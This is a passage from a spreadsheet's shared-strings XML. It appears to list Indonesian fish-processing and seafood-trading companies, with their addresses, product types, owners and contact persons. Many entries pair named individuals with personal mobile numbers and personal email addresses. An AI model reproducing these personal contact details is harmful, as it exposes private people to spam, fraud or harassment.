    <t>Yudhi Winarsono Basuki</t>
  </si>
  <si>
    <t>Nyalindung</t>
  </si>
  <si>
    <t>Wangunreja</t>
  </si>
  <si>
    <t>rizki.food.sukabumi@gmail.com</t>
  </si>
  <si>
    <t>0266 6227602</t>
  </si>
  <si>
    <t>Uswatun Khasanah (083871037652)</t>
  </si>
  <si>
    <t>Ujang Deni Kurniawan</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso No.72, Kel. Klatak, Kec. Kalipuro, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>SAIMI SALEH</t>
  </si>
  <si>
    <t>qagmcpbwi@gmail.com</t>
  </si>
  <si>
    <t>031 8961062</t>
  </si>
  <si>
    <t>GANDA RONY DIRGAWANTO / 08124916751</t>
  </si>
  <si>
    <t>KASMIATI</t>
  </si>
  <si>
    <t>PT. GOLDENSNACK MAS SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Taman Industri BSB Blok C1 No.9, Kawasan Industri BSB, Kel. Jatibarang, Kec. Mijen, Kota Semarang</t>
  </si>
  <si>
    <t>GOENAWAN KOESNANDI SANTOSO</t>
  </si>
  <si>
    <t>qaqc.goldensnack@outlook.com</t>
  </si>
  <si>
    <t>WAHYUDI, 082270942000</t>
  </si>
  <si>
    <t>CV. GIOVANNI SUKSES MAKMUR</t>
  </si>
  <si>
    <t>Jl. Berbek Industri 5 No. 1, Kel. Berbek, Kec. Waru, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Kerang Beku, Teripang Kering, Kerang Rebus Beku, Cephalopoda Beku, Ikan Demersal Segar, Tulang Ikan Kering</t>
  </si>
  <si>
    <t>Wibisono Wijono</t>
  </si>
  <si>
    <t>foodsafety@giovannifisheries.com</t>
  </si>
  <si>
    <t>ANGGIE YOGASTIAN 087866093258</t>
  </si>
  <si>
    <t>WIBISONO WIJONO</t>
  </si>
  <si>
    <t>PT. ANEKA SUMBER ALAM JAYA</t>
  </si>
  <si>
    <t>Jl. Pandaan Bangil Km 4, Dusun Tudan, Kel. Kemiri Sewu, Kec. Pandaan, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Hasil Budidaya Beku, Ikan Pelagis Beku, Ikan Demesal Beku, Fillet Ikan Beku, Keong Beku</t>
  </si>
  <si>
    <t>Sisworo Raharjo</t>
  </si>
  <si>
    <t>Kemiri Sewu</t>
  </si>
  <si>
    <t>fsiswant@hotmail.com</t>
  </si>
  <si>
    <t>0343-630631</t>
  </si>
  <si>
    <t>Freddy Siswanto 08113389850</t>
  </si>
  <si>
    <t>Freddy Siswanto</t>
  </si>
  <si>
    <t>Pergudangan Garuda Blok B2, Jl. Lantebung No.42, Kel. Bira, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>aprihamra@gmail.com</t>
  </si>
  <si>
    <t>Iyan 08129818080</t>
  </si>
  <si>
    <t>UD. SUMBER AGUNG</t>
  </si>
  <si>
    <t>Jl. Kalijudan Madya V No.10 RT 02 RW 08, Kel. Kalijudan, Kec. Mulyorejo, Kota Surabaya</t>
  </si>
  <si>
    <t>Gelembung Ikan Kering, Teripang Kering, Sirip Hiu Kering, Teripang Beku, Sirip Pari Kering, Sirip Hiu Beku, Sirip Pari Beku</t>
  </si>
  <si>
    <t>AGUNG WIDODO</t>
  </si>
  <si>
    <t>Mulyorejo</t>
  </si>
  <si>
    <t>Kalijudan</t>
  </si>
  <si>
    <t>vendrapragita@yahoo.com</t>
  </si>
  <si>
    <t>Agung Widodo 0811334960</t>
  </si>
  <si>
    <t>CV. BAHAGIA</t>
  </si>
  <si>
    <t>Jl. Gabion No.999 Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>Jamaris</t>
  </si>
  <si>
    <t>cv.bahagia12@gmail.com</t>
  </si>
  <si>
    <t>061-6945433</t>
  </si>
  <si>
    <t>Yunita 08116515991</t>
  </si>
  <si>
    <t>PT. FISHINDO INDAH TAMA</t>
  </si>
  <si>
    <t>Jl. Marunda Makmur No.368 Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Ikan Pelagis Segar, Ikan Demersal Segar, Salmon Beku, Trout Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku</t>
  </si>
  <si>
    <t>Tarumajaya</t>
  </si>
  <si>
    <t>Segara Makmur</t>
  </si>
  <si>
    <t>produksi.oceanica@gmail.com</t>
  </si>
  <si>
    <t>021-88992309</t>
  </si>
  <si>
    <t>ISHFI ARYAHIYYAH/ 081285978823</t>
  </si>
  <si>
    <t>EDY KARMIN</t>
  </si>
  <si>
    <t>CV. LAUT SARI AGUNG</t>
  </si>
  <si>
    <t>Jl. Malaka, Kel. Batu Nampar Selatan, Kec. Jerowaru, Kabupaten Lombok Timur</t>
  </si>
  <si>
    <t>Lobster Hidup, Lobster Beku, Kepiting Hidup, Kepiting Beku</t>
  </si>
  <si>
    <t>hayadi</t>
  </si>
  <si>
    <t>Jerowaru</t>
  </si>
  <si>
    <t>Batu Nampar Selatan</t>
  </si>
  <si>
    <t>lautsariagung@gmail.com</t>
  </si>
  <si>
    <t>Hayadi 085205005758</t>
  </si>
  <si>
    <t>PT. INKO GIM GORENG</t>
  </si>
  <si>
    <t>Jl. Aria Jaya Santika Kp. Cirende RT 001 RW 005, Kel. Pasir Nangka, Kec. Tigaraksa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Snack Rumput Laut</t>
  </si>
  <si>
    <t>KIM JAESUNG</t>
  </si>
  <si>
    <t>Pasir Nangka</t>
  </si>
  <si>
    <t>gimgoreng@gmail.com</t>
  </si>
  <si>
    <t>HILMAN 085210748597</t>
  </si>
  <si>
    <t>HILMAN</t>
  </si>
  <si>
    <t>PT. BERKAH ANEKA LAUT</t>
  </si>
  <si>
    <t>Jl. Lingkar Utara Mangunharjo, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo</t>
  </si>
  <si>
    <t>Fillet Ikan Demersal Beku, Fillet Ikan Beku, Cephalopoda Beku, Ikan Air Tawar Beku, Sirip Hiu Beku, Sirip Hiu Kering, Gelembung Ikan Kering</t>
  </si>
  <si>
    <t>H M. SUNARTO</t>
  </si>
  <si>
    <t>ptberkahanekalaut.qc@gmail.com</t>
  </si>
  <si>
    <t>(031) 3535281</t>
  </si>
  <si>
    <t>MOCH NURROZIQIN - 081233843197</t>
  </si>
  <si>
    <t>RIO MAULANA</t>
  </si>
  <si>
    <t>RANAFRA</t>
  </si>
  <si>
    <t>Jl. Pala Barat II Blok L No.13, Kel. Mejasem Barat, Kec. Kramat, Kabupaten Tegal</t>
  </si>
  <si>
    <t>Lainnya, Lumatan Daging, Kering</t>
  </si>
  <si>
    <t>Otak-Otak Ikan, Nugget Ikan, Stik Ikan, Bakso Ikan , Kerupuk Ikan, Siomay Ikan, Pangsit Keong</t>
  </si>
  <si>
    <t>Akhmad Untung Eka Muhadi</t>
  </si>
  <si>
    <t>Kramat</t>
  </si>
  <si>
    <t>Mejasem Barat</t>
  </si>
  <si>
    <t>ranurezqia21@gmail.com</t>
  </si>
  <si>
    <t>Dwi Ary Andayani 085225723695</t>
  </si>
  <si>
    <t>PT. PULAU MAS BAHARI</t>
  </si>
  <si>
    <t>Jl. Diponegoro Gang Ulam Kencana No.48B Pesanggaran, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>heru purnomo</t>
  </si>
  <si>
    <t>plmbali@yahoo.com</t>
  </si>
  <si>
    <t>Heru Purnomo 0811396982</t>
  </si>
  <si>
    <t>GURIH DD</t>
  </si>
  <si>
    <t>Jl. Baru RT 04, Kel. Kurau Barat, Kec. Koba, Kabupaten Bangka Tengah</t>
  </si>
  <si>
    <t>Stik Ikan, Stik Udang, Getas Ikan, Getas Cumi-cumi</t>
  </si>
  <si>
    <t>DADDI</t>
  </si>
  <si>
    <t>Koba</t>
  </si>
  <si>
    <t>Kurau Barat</t>
  </si>
  <si>
    <t>gurihdd80@gmail.com</t>
  </si>
  <si>
    <t>Daddi 085268930814</t>
  </si>
  <si>
    <t>PT. HONGXIN ALGAE INTERNATIONAL</t>
  </si>
  <si>
    <t>Jl. Pesisir Timur RT 01 RW 01, Kel. Klatakan, Kec. Kendit, Kabupaten Situbondo</t>
  </si>
  <si>
    <t xml:space="preserve">Cai Minghuang </t>
  </si>
  <si>
    <t xml:space="preserve">Klatakan </t>
  </si>
  <si>
    <t>hongxin_a@yahoo.com</t>
  </si>
  <si>
    <t>Anik Mujiati 081230305549</t>
  </si>
  <si>
    <t>PT. MACKESSEN INDONESIA</t>
  </si>
  <si>
    <t>mackessen.technicalsales@gmail.com</t>
  </si>
  <si>
    <t>Santi Marianti 081212828171</t>
  </si>
  <si>
    <t>PT. BANDUNG KULINA UTAMA</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium Jl. Millenium 11 Blok F4 No. 3 (Room 3), Kel. Peusar, Kec. Panongan, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Salmon Beku, Trout Beku, Mussel Segar, Scallop Segar, Tiram Segar, Clams Segar, Kepiting Beku, Mussel Beku, Scallop Beku, Tiram Beku, Clams Beku, Cephalopoda Segar, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Joshua P Hutagalung</t>
  </si>
  <si>
    <t>nurdianayuliani0906@gmail.com</t>
  </si>
  <si>
    <t>022-7535191</t>
  </si>
  <si>
    <t>Muhamad Iqbal Nasrulloh &amp; 081291646660</t>
  </si>
  <si>
    <t>Muhamad Iqbal Nasrulloh</t>
  </si>
  <si>
    <t>PT. NEPTUNA DWINDO MATRINA</t>
  </si>
  <si>
    <t>Selat Lampa RT 003 RW 002, Kel. Sabang Mawang Barat, Kec. Pulau Tiga, Kabupaten Natuna</t>
  </si>
  <si>
    <t>Fillet Ikan Beku, Cephalopoda Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Ikan Demersal Segar, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Dewandi</t>
  </si>
  <si>
    <t>Sabang Mawang Barat</t>
  </si>
  <si>
    <t>ndmfisherynatuna@gmail.com</t>
  </si>
  <si>
    <t>SUMINI MISNU</t>
  </si>
  <si>
    <t>Dusun Sido Mulyo RT 005, Kel. Kota Baru, Kec. Geragai, Kabupaten Tanjung Jabung Timur</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Kerupuk Udang</t>
  </si>
  <si>
    <t>SUMINI</t>
  </si>
  <si>
    <t>Geragai</t>
  </si>
  <si>
    <t>poklahsarsm@gmail.com</t>
  </si>
  <si>
    <t>SUMINI 085366662366</t>
  </si>
  <si>
    <t>CV. JALADRI INDONESIA</t>
  </si>
  <si>
    <t>Jl. Kawasan Wisata Tanjung Bayang RT 04 RW 05, Kel. Tanjung Medeka, Kec. Tamalate, Kota Makassar</t>
  </si>
  <si>
    <t xml:space="preserve">SYAFRIYAN CANDRA </t>
  </si>
  <si>
    <t>Tamalate</t>
  </si>
  <si>
    <t>Tanjung Medeka</t>
  </si>
  <si>
    <t>jaladriindonesia@gmail.com</t>
  </si>
  <si>
    <t>SYAFRIYAN CANDRA 085210292070</t>
  </si>
  <si>
    <t>SYAFRIYAN CANDRA</t>
  </si>
  <si>
    <t>Jl. Poros Maros Graha Cemerlang Blok C No.10/11, Kel. Hasanudin, Kec. Mandai, Kabupaten Maros</t>
  </si>
  <si>
    <t>HERIANTO</t>
  </si>
  <si>
    <t>Hasanudin</t>
  </si>
  <si>
    <t>cv.marvelljayafishery@gmail.com</t>
  </si>
  <si>
    <t>HERIANTO &amp; 082311662020</t>
  </si>
  <si>
    <t>CV. INDOMINA CIPTA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso No.8, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Bandeng Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Udang Beku, Kerang Beku</t>
  </si>
  <si>
    <t>SUCIPTO WIDODO</t>
  </si>
  <si>
    <t xml:space="preserve">Hulonthalangi </t>
  </si>
  <si>
    <t>Tenda</t>
  </si>
  <si>
    <t>indominaciptasejahtera@gmail.com</t>
  </si>
  <si>
    <t>I GEDE MAHAGUNADA / 08124464481</t>
  </si>
  <si>
    <t>I GEDE MAHAGUNADA</t>
  </si>
  <si>
    <t>Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Beku, Segar, Kaleng</t>
  </si>
  <si>
    <t>Daging Rajungan Bernilai Tambah Beku, Daging Rajungan Pasteurisasi Dingin, Daging Rajungan Pasteurisasi Beku, Ikan Pelagis Beku, Ikan Demersal Segar, Ikan Demersal Beku, Cumi-cumi Bernilai Tambah Beku, Cephalopoda Beku, Chilled Pasteurized Tuna, Tuna Bernilai tambah Beku, Ikan Demersal Bernilai Tambah Beku, Ikan Pelagis Bernilai Tambah Beku, Ikan Air Tawar Bernilai Tambah Beku, Kerang Pasteurisasi Beku, Kerang Pasteurisasi Dingin, Campuran Seafood Pasteurisasi Dingin, Campuran Seafood Pasteurisasi Beku, Tuna Beku, Kerang Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Phillips Foods Holding (Hongkong) Limited, Phillip</t>
  </si>
  <si>
    <t>Rejoso</t>
  </si>
  <si>
    <t>Kemantren Rejo</t>
  </si>
  <si>
    <t>aprasetya@phillipsfoods.com</t>
  </si>
  <si>
    <t>0343-481566</t>
  </si>
  <si>
    <t>Henny Fatmawati 08123547396</t>
  </si>
  <si>
    <t>Rizal Suryanzah</t>
  </si>
  <si>
    <t>PT. LINTAS LAUT SAMUDERA</t>
  </si>
  <si>
    <t>Executive Industrial Park Blok A3 No.11, Kel. Belian, Kec. Batam Kota, Kota Batam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Tuna Beku, Ikan Pelagis Beku, Cephalopoda Beku, Udang Tempura Beku, Fillet Ikan Beku, Tuna Loin Beku</t>
  </si>
  <si>
    <t>TJIN PO</t>
  </si>
  <si>
    <t>Belian</t>
  </si>
  <si>
    <t>pt.lintaslautsamudera@gmail.com</t>
  </si>
  <si>
    <t>0778 7485205</t>
  </si>
  <si>
    <t>Tjin Po</t>
  </si>
  <si>
    <t>PT. KELOLA MINA LAUT REMBANG</t>
  </si>
  <si>
    <t>Desa Purworejo RT 03 RW 02, Kec. Kaliori, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Himego Kering, Teri Nasi Kering</t>
  </si>
  <si>
    <t>kemal@kmlseafood.com</t>
  </si>
  <si>
    <t>0852-0360-3567</t>
  </si>
  <si>
    <t>Kemal 085203603567</t>
  </si>
  <si>
    <t>Darusalam</t>
  </si>
  <si>
    <t>PT. KBT SEAFOOD INTERNATIONAL</t>
  </si>
  <si>
    <t>Jl. Raya Cirebon - Tegal Km 8,2 Blok Kemis, Kel. Kanci Kulon, Kec. Astanajapura, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>RAKA RAHADIAN CIPTA</t>
  </si>
  <si>
    <t>Astanajapura</t>
  </si>
  <si>
    <t>Kanci Kulon</t>
  </si>
  <si>
    <t>qa.c@kbtseafood.com</t>
  </si>
  <si>
    <t>ELOK WAHYU &amp; 0817882729</t>
  </si>
  <si>
    <t>ARIS GUNTORO</t>
  </si>
  <si>
    <t>CV. BRIGHT OCEAN</t>
  </si>
  <si>
    <t>Jl. Madidir Ure Lingkungan III, Kel. Madidir Ure, Kec. Madidir, Kota Bitung</t>
  </si>
  <si>
    <t>Enjel Katindagho</t>
  </si>
  <si>
    <t>Madidir Ure</t>
  </si>
  <si>
    <t>eva.brightocean@gmail.com</t>
  </si>
  <si>
    <t>Eva Jeane Alung 08114300730</t>
  </si>
  <si>
    <t xml:space="preserve">Eva Jeane Alung </t>
  </si>
  <si>
    <t>PT. DEBIO</t>
  </si>
  <si>
    <t>Pergudangan Cikupa Mas Jl. Mitramas Raya No.2C RT 009 RW 004, Kel. Talagasari, Kec. Cikupa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering</t>
  </si>
  <si>
    <t>L.Harjanto Hardjani</t>
  </si>
  <si>
    <t>Talagasari</t>
  </si>
  <si>
    <t>ptdebio@gmail.com</t>
  </si>
  <si>
    <t>021-6901716</t>
  </si>
  <si>
    <t>Lupiyana 081584085843</t>
  </si>
  <si>
    <t>L.Harjanto Hardjani 081586414838</t>
  </si>
  <si>
    <t>Jl Poh Gading No.100X Taman Jimbaran, Kel. Jimbaran, Kec. Kuta Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Kerapu Hidup, Kepiting Hidup, Lobster Hidup, Kerang Hidup</t>
  </si>
  <si>
    <t>SRI PUJIASTUTI BSC</t>
  </si>
  <si>
    <t>Kuta Selatan</t>
  </si>
  <si>
    <t>Jimbaran</t>
  </si>
  <si>
    <t>cvdustrading@gmail.com</t>
  </si>
  <si>
    <t>0361 242441</t>
  </si>
  <si>
    <t>Yosev Triono 081239022233</t>
  </si>
  <si>
    <t>YOSEV TRIONO</t>
  </si>
  <si>
    <t>CV. PRIMA INVESTA NUSA TENGGARA</t>
  </si>
  <si>
    <t>Jl. Pahlawan No.102, Kel. Nunbaun Sabu, Kec. Alak, Kota Kupang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Udang Beku, Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>Yusriadi Efendi</t>
  </si>
  <si>
    <t xml:space="preserve">Alak </t>
  </si>
  <si>
    <t>Nunbaun Sabu</t>
  </si>
  <si>
    <t>yeritahun25@gmail.com</t>
  </si>
  <si>
    <t>Jazilah 081338925638</t>
  </si>
  <si>
    <t>PT. UNIMITRA ANDALAN SEJATI</t>
  </si>
  <si>
    <t>Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Kepiting Beku, Ikan Pelagis Beku, Salmon Beku, Trout Beku, Cephalopoda Beku, Tuna Beku, Udang Beku, Belut Beku, Lobster Beku, Udang Kipas Beku, Ikan Demersal Beku, Kerang Beku, Bandeng Beku, Ikan Air Tawar Beku, Teripang Beku</t>
  </si>
  <si>
    <t>Frienni Leimena</t>
  </si>
  <si>
    <t>Cikarang Utara</t>
  </si>
  <si>
    <t>Pasir Gombong</t>
  </si>
  <si>
    <t>unimitra.andalansejati@gmail.com</t>
  </si>
  <si>
    <t>021-89844538</t>
  </si>
  <si>
    <t>syarif Andi Nugroho 08118798039</t>
  </si>
  <si>
    <t>Wahyu</t>
  </si>
  <si>
    <t>PT. REPUBLIK LAUTAN JAYA</t>
  </si>
  <si>
    <t>Muara Angke PHPT Pengasinan Blok A No.6 RT 001 RW 006, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Perut Ikan Kering, Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering , Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Teripang Kering</t>
  </si>
  <si>
    <t>AHMAD ZAINI</t>
  </si>
  <si>
    <t>republiklautanjaya77@gmail.com</t>
  </si>
  <si>
    <t>021-22671958</t>
  </si>
  <si>
    <t>ENDIN SHAPTUDIN 08176014869</t>
  </si>
  <si>
    <t>PT. ALGAE SUMBA TIMUR LESTARI</t>
  </si>
  <si>
    <t>Desa Tanamanang, Kec. Pahunga Lodu, Kabupaten Sumba Timur</t>
  </si>
  <si>
    <t>PEMERINTAH KABUPATEN SUMBA TIMUR</t>
  </si>
  <si>
    <t>Pahunga Lodu</t>
  </si>
  <si>
    <t>Desa Tanamanang</t>
  </si>
  <si>
    <t>astilwaingapu@gmail.com</t>
  </si>
  <si>
    <t>Lia 082146215797</t>
  </si>
  <si>
    <t>Ir. Maxon M Pekuwali, M.Si</t>
  </si>
  <si>
    <t>TUNAS BARU</t>
  </si>
  <si>
    <t>Lrg. Rimba Sakti RT 20, Desa Pudak, Kec. Kumpeh Ulu, Kabupaten Muaro Jambi</t>
  </si>
  <si>
    <t>Kerupuk Tulang Patin, Abon Patin</t>
  </si>
  <si>
    <t>Tri warni</t>
  </si>
  <si>
    <t>Kumpeh Ulu</t>
  </si>
  <si>
    <t>Pudak</t>
  </si>
  <si>
    <t>timan.tunasbaru@gmail.com</t>
  </si>
  <si>
    <t>Timan</t>
  </si>
  <si>
    <t>PT. FOSS CAHAYA BINTANG LAUT</t>
  </si>
  <si>
    <t>Kp. Gaga Rawa Kompeni RT 001 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang</t>
  </si>
  <si>
    <t>Kepiting Hidup, Kerang Hidup, Keong Hidup, Lobster Hidup, Kerapu Hidup, Udang Ronggeng Hidup</t>
  </si>
  <si>
    <t>DAVID</t>
  </si>
  <si>
    <t>ptfosscahayabintanglaut@gmail.com</t>
  </si>
  <si>
    <t>PT. INDONA SAMUDRA PASIFIK INDONESIA</t>
  </si>
  <si>
    <t>Jl. Sanrangan No.14, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Tuna Segar, Kerang Segar, Udang Segar</t>
  </si>
  <si>
    <t>Abdurrahman, SE</t>
  </si>
  <si>
    <t>indonasamudrapasifikindonesia@gmail.com</t>
  </si>
  <si>
    <t>Abdurrahman, SE &amp; 085341472989</t>
  </si>
  <si>
    <t>PT. HOLI MINA JAYA</t>
  </si>
  <si>
    <t>Komplek UPTD PPI Ujung Baroh, Jl. TPI, Kel. Ujong Baroh, Kec. Johan Pahlawan, Kabupaten Aceh Barat</t>
  </si>
  <si>
    <t>Tanto Hermawan</t>
  </si>
  <si>
    <t>Johan Pahlawan</t>
  </si>
  <si>
    <t>Ujong Baroh</t>
  </si>
  <si>
    <t>ikbalaulia12345@gmail.com</t>
  </si>
  <si>
    <t>Yenni 082360225385</t>
  </si>
  <si>
    <t>Adrian Agung Sagita</t>
  </si>
  <si>
    <t>UD. CAHAYA KENCANA</t>
  </si>
  <si>
    <t>Jl. Majapahit No.28, Kel. Gedangrowo, Kec. Prambon, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Rudy Tjahyono</t>
  </si>
  <si>
    <t>Prambon</t>
  </si>
  <si>
    <t>Gedangrowo</t>
  </si>
  <si>
    <t>steven@trinusafood.com</t>
  </si>
  <si>
    <t>Andre Tjahyono / 081218621410</t>
  </si>
  <si>
    <t>Andre Tjahyono</t>
  </si>
  <si>
    <t>PT. AZELIS INDONESIA DISTRIBUSI</t>
  </si>
  <si>
    <t>Greenland International Industrial Center (GIIC), Jl. Boulevard Blok CB No.01, Desa Sukamukti, Kec. Bojong Mangu, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Dr. Hans Udo Wenzel</t>
  </si>
  <si>
    <t>Bojong Mangu</t>
  </si>
  <si>
    <t>Sukamukti</t>
  </si>
  <si>
    <t>putri.eka@azelis.com</t>
  </si>
  <si>
    <t>Putri Eka Risti &amp; 081293676253</t>
  </si>
  <si>
    <t>Antonius Utomo Prihantono</t>
  </si>
  <si>
    <t>CV. SOON HO</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Demersal Segar, Cephalopoda Segar, Kerang Segar</t>
  </si>
  <si>
    <t>So Huan</t>
  </si>
  <si>
    <t>haccp.soonho@gmail.com</t>
  </si>
  <si>
    <t>PT. INDOGUNA UTAMA</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium Jl. Millenium 22 Blok R-5 No.3 Room C3, Kel. Kadu Agung, Kec. Tiga Raksa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Salmon Beku, Trout Beku, Salmon Segar, Trout Segar, Cephalopoda Beku, Cephalopoda Segar, Kerang Beku, Kerang Segar, Kepiting Beku</t>
  </si>
  <si>
    <t>SORAYA KUSUMA EFFENDY</t>
  </si>
  <si>
    <t>Tiga Raksa</t>
  </si>
  <si>
    <t>Kadu Agung</t>
  </si>
  <si>
    <t>indahnadira640@gmail.com</t>
  </si>
  <si>
    <t>021-8610550</t>
  </si>
  <si>
    <t>Indah Setyorini &amp; 0896758433434</t>
  </si>
  <si>
    <t>PT. MUARA ANUGERAH JAYA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok S No.14, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Tuna Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>SALAM</t>
  </si>
  <si>
    <t>ramdanichsan@gmail.com</t>
  </si>
  <si>
    <t>021-66606027, 021-66606028</t>
  </si>
  <si>
    <t>SALLYANA 081316728079</t>
  </si>
  <si>
    <t>RONY CHRISTIAWAN SALAM</t>
  </si>
  <si>
    <t>CV. ANUGRAH BAHARI</t>
  </si>
  <si>
    <t>Jl. Sabutung Baru No.14, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar, Cephalopoda Segar, Tuna Segar, Udang Segar</t>
  </si>
  <si>
    <t>USMAN</t>
  </si>
  <si>
    <t>anugrahbhr43@gmail.com</t>
  </si>
  <si>
    <t>Abd. Kadir 08114496723</t>
  </si>
  <si>
    <t>PT. BUDI JAYA BERDIKARI</t>
  </si>
  <si>
    <t>Dusun II, Kel. Air Joman Baru, Kec. Air Joman, Kabupaten Asahan</t>
  </si>
  <si>
    <t>Udang Kering, Cumi-cumi Kering, Kerang Segar, Ikan Pelagis Segar, Ikan Demersal Segar, Cephalopoda Segar, Daging Kerang Beku, Ikan Asin Kering, Udang Segar</t>
  </si>
  <si>
    <t>Budi Syahputra</t>
  </si>
  <si>
    <t>Air Joman</t>
  </si>
  <si>
    <t>Air Joman Baru</t>
  </si>
  <si>
    <t>budijayaberdikari@gmail.com</t>
  </si>
  <si>
    <t>Budi Syahputra 081263974787</t>
  </si>
  <si>
    <t>CV. ANUGRAH ANDALAN NELAYAN</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Muara Angke No.25, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>SUTRISNO SURJA</t>
  </si>
  <si>
    <t>cvanugrahandalannelayan@gmail.com</t>
  </si>
  <si>
    <t>SUTRISNO SURJA 08128983826</t>
  </si>
  <si>
    <t>PT. ROTE KARAGINAN NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Latukoko Oliana RT 003 RW 005, Kel. Tablolong, Kec. Kupang Barat, Kabupaten Kupang</t>
  </si>
  <si>
    <t>Alkali Treated Chips, Semi Refined Carrageenan</t>
  </si>
  <si>
    <t>Haris Pratama</t>
  </si>
  <si>
    <t>Kupang Barat</t>
  </si>
  <si>
    <t>Tablolong</t>
  </si>
  <si>
    <t>rotekaraginan@gmail.com</t>
  </si>
  <si>
    <t>Mesak K. Saba, 081339034900</t>
  </si>
  <si>
    <t>Johny Lino</t>
  </si>
  <si>
    <t>PT. YFIN INTERNATIONAL</t>
  </si>
  <si>
    <t>Pergudangan Sentra Kosambi Blok G-1/F, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Udang Beku, Kerang Beku, Perut Ikan Beku, Hiu Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>Drs Juniusco Cuaca MBA</t>
  </si>
  <si>
    <t>ida@yfininternational.com</t>
  </si>
  <si>
    <t>021-55966224</t>
  </si>
  <si>
    <t>AHMAD ALI NURHAKIM (082218770582)</t>
  </si>
  <si>
    <t>CV. ANUGRAH LIN PERKASA</t>
  </si>
  <si>
    <t>Jl. Kima No.20, Kel. Bira, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>SUPRIYONO</t>
  </si>
  <si>
    <t>supriyonoh7@gmail.com</t>
  </si>
  <si>
    <t>SUPRIYONO &amp; 081249852617</t>
  </si>
  <si>
    <t>UD. SAMUDERA SUKSES</t>
  </si>
  <si>
    <t>Jl. Metal Komplek Ruko Metal Minimalis No.9, Kel. Tanjung Mulia, Kec. Medan Deli, Kota Medan</t>
  </si>
  <si>
    <t xml:space="preserve">Lady Fristanti </t>
  </si>
  <si>
    <t>Tanjung Mulia</t>
  </si>
  <si>
    <t>ud.samuderasukses@gmail.com</t>
  </si>
  <si>
    <t>Lady Fristanti 08126004833</t>
  </si>
  <si>
    <t>PT. SURYA INTI ANEKA PANGAN</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso No.8 RT 04 RW 02, Kel. Bulang, Kec. Prambon, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>DJONI GUNAWAN</t>
  </si>
  <si>
    <t>contact@ptsiap.com</t>
  </si>
  <si>
    <t>031-99621777</t>
  </si>
  <si>
    <t>CANDRA SURYA GUNAWAN &amp; 087851811888</t>
  </si>
  <si>
    <t>PT. MINA MAJU SEJAHTERA</t>
  </si>
  <si>
